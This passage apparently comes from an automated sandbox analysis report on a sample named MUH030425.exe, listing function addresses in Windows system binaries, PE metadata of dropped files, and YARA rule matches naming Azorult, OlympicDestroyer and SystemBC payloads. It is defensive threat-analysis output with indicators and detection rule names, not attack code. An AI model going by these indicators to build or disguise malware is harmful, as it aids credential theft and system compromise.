              Source: C:\Windows\System32\Locator.exeCode function: 27_2_007479F027_2_007479F0
              Source: C:\Windows\System32\Locator.exeCode function: 27_2_0076EEB027_2_0076EEB0
              Source: C:\Windows\System32\Locator.exeCode function: 27_2_007692A027_2_007692A0
              Source: C:\Windows\System32\Locator.exeCode function: 27_2_007693B027_2_007693B0
              Source: C:\Windows\System32\SensorDataService.exeCode function: 29_2_004A7C0029_2_004A7C00
              Source: C:\Windows\System32\SensorDataService.exeCode function: 29_2_004CA81029_2_004CA810
              Source: C:\Windows\System32\SensorDataService.exeCode function: 29_2_004D2D4029_2_004D2D40
              Source: C:\Windows\System32\SensorDataService.exeCode function: 29_2_004A79F029_2_004A79F0
              Source: C:\Windows\System32\SensorDataService.exeCode function: 29_2_004C92A029_2_004C92A0
              Source: C:\Windows\System32\SensorDataService.exeCode function: 29_2_004CEEB029_2_004CEEB0
              Source: C:\Windows\System32\SensorDataService.exeCode function: 29_2_004C93B029_2_004C93B0
              Source: C:\Windows\System32\snmptrap.exeCode function: 30_2_006C7C0030_2_006C7C00
              Source: C:\Windows\System32\snmptrap.exeCode function: 30_2_006EA81030_2_006EA810
              Source: C:\Windows\System32\snmptrap.exeCode function: 30_2_006F2D4030_2_006F2D40
              Source: C:\Windows\System32\snmptrap.exeCode function: 30_2_006C79F030_2_006C79F0
              Source: C:\Windows\System32\snmptrap.exeCode function: 30_2_006E92A030_2_006E92A0
              Source: C:\Windows\System32\snmptrap.exeCode function: 30_2_006EEEB030_2_006EEEB0
              Source: C:\Windows\System32\snmptrap.exeCode function: 30_2_006E93B030_2_006E93B0
              Source: C:\Windows\System32\Spectrum.exeCode function: 31_2_004A7C0031_2_004A7C00
              Source: C:\Windows\System32\Spectrum.exeCode function: 31_2_004CA81031_2_004CA810
              Source: C:\Windows\System32\Spectrum.exeCode function: 31_2_004D2D4031_2_004D2D40
              Source: C:\Windows\System32\Spectrum.exeCode function: 31_2_004A79F031_2_004A79F0
              Source: C:\Windows\System32\Spectrum.exeCode function: 31_2_004C92A031_2_004C92A0
              Source: C:\Windows\System32\Spectrum.exeCode function: 31_2_004CEEB031_2_004CEEB0
              Source: C:\Windows\System32\Spectrum.exeCode function: 31_2_004C93B031_2_004C93B0
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 32_2_00D9A81032_2_00D9A810
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 32_2_00D77C0032_2_00D77C00
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 32_2_00D779F032_2_00D779F0
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 32_2_00DA2D4032_2_00DA2D40
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 32_2_00D9EEB032_2_00D9EEB0
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 32_2_00D992A032_2_00D992A0
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 32_2_00D993B032_2_00D993B0
              Source: C:\Windows\System32\TieringEngineService.exeCode function: 34_2_006D7C0034_2_006D7C00
              Source: C:\Windows\System32\TieringEngineService.exeCode function: 34_2_006FA81034_2_006FA810
              Source: C:\Windows\System32\TieringEngineService.exeCode function: 34_2_00702D4034_2_00702D40
              Source: C:\Windows\System32\TieringEngineService.exeCode function: 34_2_006D79F034_2_006D79F0
              Source: C:\Windows\System32\TieringEngineService.exeCode function: 34_2_006F92A034_2_006F92A0
              Source: C:\Windows\System32\TieringEngineService.exeCode function: 34_2_006FEEB034_2_006FEEB0
              Source: C:\Windows\System32\TieringEngineService.exeCode function: 34_2_006F93B034_2_006F93B0
              Source: C:\Windows\System32\AgentService.exeCode function: 36_2_00BAA81036_2_00BAA810
              Source: C:\Windows\System32\AgentService.exeCode function: 36_2_00B87C0036_2_00B87C00
              Source: C:\Windows\System32\AgentService.exeCode function: 36_2_00B879F036_2_00B879F0
              Source: C:\Windows\System32\AgentService.exeCode function: 36_2_00BB2D4036_2_00BB2D40
              Source: C:\Windows\System32\AgentService.exeCode function: 36_2_00BAEEB036_2_00BAEEB0
              Source: C:\Windows\System32\AgentService.exeCode function: 36_2_00BA92A036_2_00BA92A0
              Source: C:\Windows\System32\AgentService.exeCode function: 36_2_00BA93B036_2_00BA93B0
              Source: C:\Windows\System32\vds.exeCode function: 37_2_00C27C0037_2_00C27C00
              Source: C:\Windows\System32\vds.exeCode function: 37_2_00C4A81037_2_00C4A810
              Source: C:\Windows\System32\vds.exeCode function: 37_2_00C279F037_2_00C279F0
              Source: C:\Windows\System32\vds.exeCode function: 37_2_00C52D4037_2_00C52D40
              Source: C:\Windows\System32\vds.exeCode function: 37_2_00C492A037_2_00C492A0
              Source: C:\Windows\System32\vds.exeCode function: 37_2_00C4EEB037_2_00C4EEB0
              Source: C:\Windows\System32\vds.exeCode function: 37_2_00C493B037_2_00C493B0
              Source: C:\Windows\System32\wbengine.exeCode function: 39_2_0078A81039_2_0078A810
              Source: C:\Windows\System32\wbengine.exeCode function: 39_2_00767C0039_2_00767C00
              Source: C:\Windows\System32\wbengine.exeCode function: 39_2_00792D4039_2_00792D40
              Source: C:\Windows\System32\wbengine.exeCode function: 39_2_007679F039_2_007679F0
              Source: C:\Windows\System32\wbengine.exeCode function: 39_2_0078EEB039_2_0078EEB0
              Source: C:\Windows\System32\wbengine.exeCode function: 39_2_007892A039_2_007892A0
              Source: C:\Windows\System32\wbengine.exeCode function: 39_2_007893B039_2_007893B0
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Load Driver
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Security
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00404E64 appears 33 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 004062D8 appears 34 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00403B98 appears 44 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00404E3C appears 87 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 004034E4 appears 36 times
              Source: C:\Users\user\Desktop\MUH030425.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 1792
              Source: SingleClientServicesUpdater.exe.8.drStatic PE information: Resource name: 7Z type: 7-zip archive data, version 0.4
              Source: elevation_service.exe.8.drStatic PE information: Number of sections : 12 > 10
              Source: elevation_service.exe0.8.drStatic PE information: Number of sections : 12 > 10
              Source: api-ms-win-core-heap-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-interlocked-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-processthreads-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-errorhandling-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-processenvironment-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l2-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-string-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-util-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-console-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-synch-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-timezone-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-locale-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-profile-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-handle-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-synch-l1-2-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-localization-l1-2-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-processthreads-l1-1-1.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-utility-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-debug-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-multibyte-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-namedpipe-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-time-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-math-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-datetime-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-convert-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-string-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-rtlsupport-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-runtime-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-sysinfo-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-process-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-heap-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-conio-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l1-2-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-libraryloader-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-memory-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-private-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-environment-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-stdio-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-filesystem-l1-1-0.dll.8.drStatic PE information: No import functions for PE file found
              Source: MUH030425.exe, 00000000.00000002.1691032810.00000000042F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs MUH030425.exe
              Source: MUH030425.exe, 00000000.00000002.1701889184.00000000064DF000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs MUH030425.exe
              Source: MUH030425.exe, 00000000.00000002.1691032810.000000000417E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs MUH030425.exe
              Source: MUH030425.exe, 00000000.00000002.1669836171.0000000000CFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs MUH030425.exe
              Source: MUH030425.exe, 00000000.00000000.1390493328.00000000006A2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamepixuBt.exe: vs MUH030425.exe
              Source: MUH030425.exe, 00000000.00000002.1700321220.00000000050F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameFlatForm.dll2 vs MUH030425.exe
              Source: MUH030425.exeBinary or memory string: OriginalFilenamepixuBt.exe: vs MUH030425.exe
              Source: unknownDriver loaded: C:\Windows\System32\drivers\AppVStrm.sys
              Source: MUH030425.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 8.2.RegSvcs.exe.4f5999a.6.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
              Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 8.2.RegSvcs.exe.4ecc25c.5.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
              Source: 8.2.RegSvcs.exe.4ecc25c.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
              Source: 8.2.RegSvcs.exe.4eee249.7.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
              Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.1691032810.0000000003BED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: 00000000.00000002.1691032810.0000000003BED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.1691032810.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: 00000000.00000002.1691032810.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000002.1600484490.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: 00000008.00000002.1600484490.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 00000008.00000002.1600484490.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.1691032810.0000000003F5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: 00000000.00000002.1691032810.0000000003F5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: AcrobatInfo.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: acrobat_sl.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AcroBroker.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AcroCEF.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: SingleClientServicesUpdater.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: armsvc.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: alg.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AppVClient.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: DiagnosticsHub.StandardCollector.Service.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: FXSSVC.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: elevation_service.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: elevation_service.exe0.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: maintenanceservice.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msdtc.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msiexec.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: PerceptionSimulationService.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: perfhost.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Locator.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: MsSense.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: SensorDataService.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: snmptrap.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Spectrum.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ssh-agent.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: TieringEngineService.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AgentService.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: vds.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: VSSVC.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: wbengine.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: WmiApSrv.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: wmpnetwk.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: SearchIndexer.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AcrobatInfo.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: acrobat_sl.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AcroBroker.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AcroCEF.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: SingleClientServicesUpdater.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: armsvc.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: alg.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AppVClient.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: DiagnosticsHub.StandardCollector.Service.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: FXSSVC.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: elevation_service.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: elevation_service.exe0.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
